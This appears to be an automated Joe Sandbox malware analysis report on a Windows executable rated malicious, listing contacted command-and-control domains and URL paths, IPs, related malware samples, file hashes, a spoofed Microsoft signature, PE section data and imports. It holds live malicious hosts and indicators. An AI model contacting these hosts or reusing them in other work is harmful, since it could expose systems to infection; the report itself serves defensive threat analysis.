http://www.partymaxclubmen36.click	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://sectigo.com/CPS0	Iifpj4i2kC.exe	false	URL Reputation: safe	unknown
http://www.zruypj169g.top	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com-	explorer.exe, 00000006.00000000.2140399407.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4575546415.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2981043334.000000000C086000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.partymaxclubmen36.click/md02/	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	explorer.exe, 00000006.00000002.4564447597.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.onsen1508.com	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.zruypj169g.top/md02/	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comEMd	explorer.exe, 00000006.00000002.4575208679.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2140399407.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.a1b5v.xyz/md02/	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.barnesassetrecovery.store	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.barnesassetrecovery.store/md02/www.upcyclecharms.com	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.teplo-invest.com/md02/www.zbbnp.xyz	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.teplo-invest.com/md02/	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.partymaxclubmen36.clickReferer:	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation	explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rakring.com/md02/	explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.zbbnp.xyz	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.teplo-invest.com	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.zbbnp.xyz/md02/www.33mgbet.com	explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/	explorer.exe, 00000006.00000000.2137414570.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.235.47.188	www.wshifen.com	Hong Kong		55967	BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd	true
104.18.14.105	cbmsource-web-5091.rejcdn.com	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1529801
Start date and time:	2024-10-09 12:32:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	Iifpj4i2kC.exe renamed because original name is a hash value
Original Sample Name:	fd828c534b0e6ce946192311dd9fadad98e82fcc91fe1f3bdbdc652ccc3fc3d0.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@13/0@13/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 72% Number of executed functions: 64 Number of non-executed functions: 246
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:33:21	API Interceptor	8433292x Sleep call for process: explorer.exe modified
06:33:45	API Interceptor	7591716x Sleep call for process: wlanext.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.235.47.188	3.exe	Get hash	malicious	BlackMoon, XRed	Browse	www.baidu.com/
	CZyOWoN2hiszA6d.exe	Get hash	malicious	FormBook	Browse	www.vicmvm649n.top/v15n/?Yn=UsBn8mn1PUl4czyMQZxenuqc6dPBc+Q3khu6MN2NNQj7YA4ug5lWpId+R/K0fD87Hm6v&mv=Y4QppplhSjwxWBd
	f2.exe	Get hash	malicious	BlackMoon	Browse	www.baidu.com/
	f1.exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	SecuriteInfo.com.FileRepMalware.29184.31872.exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	chAJcIK6ZO.exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	LisectAVT_2403002A_489.exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exe	Get hash	malicious	Bdaejec	Browse	www.baidu.com/
	7Y18r(100).exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	7Y18r(100).exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
104.18.14.105	pLGt7Q7FHj.dll	Get hash	malicious	Unknown	Browse	qhutv.com/v2/E452684F-C138-4390-BFC8-A9E48B2F1649?v=newcounterado1

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.wshifen.com	https://www.baidu.com/link?url=7AgUGxkCgEsQdPm9T1PXcA0XghaPOWMLvdhGyyVngg844uS4x-KZy4IMqs1ov0OgdFqhAB-_X2oOV9exK4hWC_&wd=ZWxraW58WTI5eVpUUmpaUzVqYjIwPXxNYkdVSlpkdVROdWNyeW1UWU1laElVVW1QbGRGb0F5RmNLcWJadW1CT01YYw==	Get hash	malicious	HTMLPhisher	Browse	103.235.46.96
	kHslwiV2w6.exe	Get hash	malicious	FormBook	Browse	103.235.47.188
	http://wap.smarthomehungary.com/	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://www.allencai.net/	Get hash	malicious	Unknown	Browse	103.235.46.96
	LuJJk0US5g.msi	Get hash	malicious	Unknown	Browse	103.235.46.96
	https://ebaite.cn/	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://wap.theblmediagroup.com/	Get hash	malicious	Unknown	Browse	103.235.47.188
	http://hbyczyz.com/xrr	Get hash	malicious	Unknown	Browse	103.235.47.188
	http://www.tpckn.app/	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://dl.im-dl.shop/	Get hash	malicious	Unknown	Browse	103.235.46.96
cbmsource-web-5091.rejcdn.com	Narud#U017ebenica 08BIH2024.exe	Get hash	malicious	FormBook	Browse	104.18.43.29
pixie.porkbun.com	SecuriteInfo.com.Exploit.CVE-2017-11882.123.7774.12516.rtf	Get hash	malicious	FormBook	Browse	44.227.65.245
	PR_Form_20240809_145815.exe	Get hash	malicious	FormBook	Browse	44.227.76.166
	doc78891&7388972367.exe	Get hash	malicious	FormBook	Browse	44.227.65.245
	Pedido de Cota#U00e7#U00e3o - RFQ 31072024_Lista comercial.bat.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	44.227.65.245
	r777528623004-FedEx-Shipping-Label.exe	Get hash	malicious	FormBook	Browse	44.227.76.166
	TKmXl4wRgh7Wbvr.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	44.227.76.166
	NUEVO ORDEN_202407238454854.pdf.exe	Get hash	malicious	FormBook	Browse	44.227.76.166
	AB2hQJZ77ipdWem.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	44.227.65.245
	PO-2024151-pdf.gz.exe	Get hash	malicious	FormBook	Browse	44.227.65.245
	DHL_TOC2_2407081728458457.pdf.exe	Get hash	malicious	FormBook	Browse	44.227.65.245

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	4XQ5CxjWnW.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	mkN4VLmTt4.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	rRdJ0JnTcM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	ixgyfGK4yl.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	HWAf2RPKH6.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	188.114.97.3
	1tCwYQCFhP.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	dOUqnFQ67h.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	rrpC2ZDgUd.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	kG713MWffq.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	rRdJ0JnTcM.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd	http://guantongfan.com/	Get hash	malicious	Unknown	Browse	182.61.201.93
	https://www.baidu.com/link?url=7AgUGxkCgEsQdPm9T1PXcA0XghaPOWMLvdhGyyVngg844uS4x-KZy4IMqs1ov0OgdFqhAB-_X2oOV9exK4hWC_&wd=ZWxraW58WTI5eVpUUmpaUzVqYjIwPXxNYkdVSlpkdVROdWNyeW1UWU1laElVVW1QbGRGb0F5RmNLcWJadW1CT01YYw==	Get hash	malicious	HTMLPhisher	Browse	103.235.46.96
	http://wap.smarthomehungary.com/	Get hash	malicious	Unknown	Browse	182.61.244.229
	http://www.allencai.net/	Get hash	malicious	Unknown	Browse	182.61.244.229
	LuJJk0US5g.msi	Get hash	malicious	Unknown	Browse	103.235.46.96
	https://okfun188.com/	Get hash	malicious	Unknown	Browse	185.10.104.119
	https://ebaite.cn/	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://wap.theblmediagroup.com/	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://hbyczyz.com/xrr	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://www.tpckn.app/	Get hash	malicious	Unknown	Browse	103.235.46.96

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.067666110947127
TrID:	Win64 Executable GUI (202006/5) 77.37% InstallShield setup (43055/19) 16.49% Win64 Executable (generic) (12005/4) 4.60% Generic Win/DOS Executable (2004/3) 0.77% DOS Executable Generic (2002/1) 0.77%
File name:	Iifpj4i2kC.exe
File size:	1'627'744 bytes
MD5:	f6e047942236cefdcd6559bca66a7b3e
SHA1:	28aac545fcd0c9b11d2546110966b812d1c6d920
SHA256:	fd828c534b0e6ce946192311dd9fadad98e82fcc91fe1f3bdbdc652ccc3fc3d0
SHA512:	5cb5d39d739e1698772e59b3f50da44cb7279a3f7df1ac5319dedc823f62ecf14f5b0ff68c4e67fe8e1595235242f83d17c86b50e82c16b8c8e6cc40d7525eeb
SSDEEP:	49152:WAodtaG9kS2U84B+FLan9k5TRM9zlCVjkvr:K/B1Jz
TLSH:	D375BF19E3A811FCD52BC634CA55A233E6B174560B21A4CF1B99C7452FB3EE26B7B301
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E......E...E...E...D...E...D...E...D/..E..BE...EJ..D...E...E...E...D...E...D...E...E...E...DD..EI..D...EI..D...E...............

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x14006ac2c
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66E5ADB8 [Sat Sep 14 15:37:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	22a65106d3d84ea74d966fa0424a5a0c

Authenticode Signature

Signature Valid:	false
Signature Issuer:	C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	24/09/2024 08:07:22 24/09/2025 08:07:22
Subject Chain	C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
Version:	3
Thumbprint MD5:	8826EDA56AE918ACA0EB62B575B57F1B
Thumbprint SHA-1:	053CD73422AF02946A364378AE001C1964B05CAB
Thumbprint SHA-256:	600744D0FF24705E75C13BB64D916B2A929E430747C684D8854AD8E6CCDA519B
Serial:	7E3F87EB2FC12CDCDDCCE4A1AE9D2DCA

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F9350E0456Ch
dec eax
add esp, 28h
jmp 00007F9350E03D97h
int3
int3
jmp 00007F9350E048E8h
int3
int3
int3
dec eax
sub esp, 28h
call 00007F9350E048E4h
jmp 00007F9350E03F24h
xor eax, eax
dec eax
add esp, 28h
ret
int3
int3
jmp 00007F9350E03F0Ch
int3
int3
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007F9350E03F32h
mov eax, 00000001h
dec eax
add esp, 28h
ret
int3
int3
int3
inc eax
push ebx
inc ebp
mov ebx, dword ptr [eax]
dec eax
mov ebx, edx
inc ecx
and ebx, FFFFFFF8h
dec esp
mov ecx, ecx
inc ecx
test byte ptr [eax], 00000004h
dec esp
mov edx, ecx
je 00007F9350E03F35h
inc ecx
mov eax, dword ptr [eax+08h]
dec ebp
arpl word ptr [eax+04h], dx
neg eax
dec esp
add edx, ecx
dec eax
arpl ax, cx
dec esp
and edx, ecx
dec ecx
arpl bx, ax
dec edx
mov edx, dword ptr [eax+edx]
dec eax
mov eax, dword ptr [ebx+10h]
mov ecx, dword ptr [eax+08h]
dec eax
mov eax, dword ptr [ebx+08h]
test byte ptr [ecx+eax+03h], 0000000Fh
je 00007F9350E03F2Dh
movzx eax, byte ptr [ecx+eax+03h]
and eax, FFFFFFF0h
dec esp
add ecx, eax
dec esp
xor ecx, edx
dec ecx
mov ecx, ecx
pop ebx
jmp 00007F9350E03F36h
int3
int3
int3
int3
int3
int3
int3
nop word ptr [eax+eax+00000000h]
dec eax
cmp ecx, dword ptr [00000049h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x17f3c0	0x5c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17f41c	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x19c000	0x2eb54	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x18f000	0xcdec	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x18b800	0x1e60	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1cb000	0x5b8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x165ae0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x165d00	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1659a0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11a000	0x6a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6f188	0x6f200	16824105689e93571b28f6d652acf3f1	False	0.45466728768278963	data	6.6338226603175485	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.managed	0x71000	0x77a28	0x77c00	459fe8e4d0429964edfb07e39e66b232	False	0.46850331093423797	data	6.473781869755907	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
hydrated	0xe9000	0x30498	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x11a000	0x66c6a	0x66e00	7df08d7d95f6107c50c873cb3368ef26	False	0.48810088851761846	data	6.702736272283783	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x181000	0xd5a8	0x1800	9d5075bd44b367f703d8e922b003398a	False	0.2294921875	data	3.190641782829915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x18f000	0xcdec	0xce00	638451eb673a6cdf25f666b19f1b8bb4	False	0.49419751213592233	data	6.064103613023274	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x19c000	0x2eb54	0x2ec00	a9622bdd9363b21229c0fc67521649a0	False	0.9952111881684492	data	7.996796800307504	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1cb000	0x5b8	0x600	adcf9b9e4d3994d1018ad464f4f1db74	False	0.5826822916666666	data	5.215191968056739	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
BINARY	0x19c130	0x2e484	data	1.0003481526807756
RT_VERSION	0x1ca5b4	0x3b4	data	0.3438818565400844
RT_MANIFEST	0x1ca968	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
ADVAPI32.dll	RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegEnumValueW
bcrypt.dll	BCryptCloseAlgorithmProvider, BCryptGenerateSymmetricKey, BCryptDestroyKey, BCryptOpenAlgorithmProvider, BCryptGenRandom
KERNEL32.dll	TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, GetConsoleWindow, FreeConsole, AllocConsole, SetLastError, GetLastError, LocalFree, CloseHandle, ExitProcess, GetTickCount64, FormatMessageW, K32EnumProcessModulesEx, IsWow64Process, GetExitCodeProcess, OpenProcess, K32EnumProcesses, K32GetModuleInformation, K32GetModuleBaseNameW, K32GetModuleFileNameExW, GetProcessId, DuplicateHandle, GetCurrentProcess, CloseThreadpoolIo, GetCurrentProcessId, MultiByteToWideChar, GetStdHandle, RaiseFailFastException, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, ResolveLocaleName, FindStringOrdinal, GetCurrentThread, Sleep, DeleteCriticalSection, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, QueryPerformanceCounter, InitializeCriticalSection, InitializeConditionVariable, WaitForMultipleObjectsEx, QueryPerformanceFrequency, GetFullPathNameW, GetLongPathNameW, 